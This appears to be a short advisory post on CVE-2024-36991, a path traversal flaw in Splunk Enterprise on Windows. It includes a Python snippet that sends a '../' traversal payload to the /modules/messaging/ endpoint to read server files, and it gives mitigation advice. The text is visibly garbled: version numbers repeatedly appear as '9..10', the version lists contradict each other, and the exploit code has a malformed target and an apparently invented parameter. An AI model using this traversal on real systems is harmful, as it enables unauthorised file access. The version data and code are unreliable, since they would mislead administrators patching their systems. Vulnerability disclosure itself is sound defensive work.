CVE-2024-36991: Path Traversal Vulnerability in Splunk Enterprise on Windows

A new vulnerability, CVE-2024-36991, has been identified in Splunk Enterprise on the Windows platform. The flaw, which affects versions below 9.2.2, 9.1.5, and 9..10, enables an attacker to perform a path traversal attack on the /modules/messaging/ endpoint. This vulnerability is specific to Splunk Enterprise running on Windows.

Background and Description of the Vulnerability

Splunk Enterprise is an incredibly powerful tool for collecting and analyzing machine-generated data in real-time. As part of its design, the software comes with numerous endpoints that can be used for data analysis and management. One of these endpoints is /modules/messaging/. Due to a misconfiguration in the affected versions, this endpoint becomes a potential target for a path traversal attack.

A path traversal attack, often referred to as "directory traversal," allows an attacker to access files and directories on the server that should be restricted. By manipulating the URL and exploiting the vulnerable endpoint, an attacker can read and possibly manipulate sensitive data stored on the server.

Exploit Details

The path traversal vulnerability is exploitable in the following Splunk Enterprise versions on Windows:

Versions below 9..10

Note that this flaw does not affect Splunk Enterprise on non-Windows platforms.

To exploit this vulnerability, an attacker simply needs to send a carefully crafted HTTP GET request to the vulnerable endpoint:

import requests

target = "http://victim.com:808";
endpoint = "/modules/messaging/"
path_to_file = "../../../../../../../PATH_TO_TARGET_FILE"

payload = {
  "param": path_to_file
}

response = requests.get(f"{target}{endpoint}", params=payload)
print(response.text)

Using this technique, an attacker can access sensitive files and potentially compromise the security of the Splunk Enterprise installation on the Windows server.

Mitigation and Patch Information

To address this vulnerability, Splunk has released patches for affected version branches. Users running Splunk Enterprise on Windows are strongly encouraged to update their installations as soon as possible to the following patched versions:

9..10 and above

Moreover, be sure to follow best practices for server hardening to reduce the chance of future vulnerabilities.

Original References

- Official CVE Details
- Splunk Security Advisory
- National Vulnerability Database

Wrap Up

In conclusion, the path traversal vulnerability (CVE-2024-36991) identified in Splunk Enterprise on Windows can have serious consequences if exploited. It is crucial that users running affected versions promptly update their installations to protected versions. By staying abreast of security updates and best practices, administrators can ensure the continued security and operational efficiency of their Splunk Enterprise installations.

Timeline

Published on: 07/01/2024 17:15:07 UTC
Last modified on: 07/22/2024 15:00:45 UTC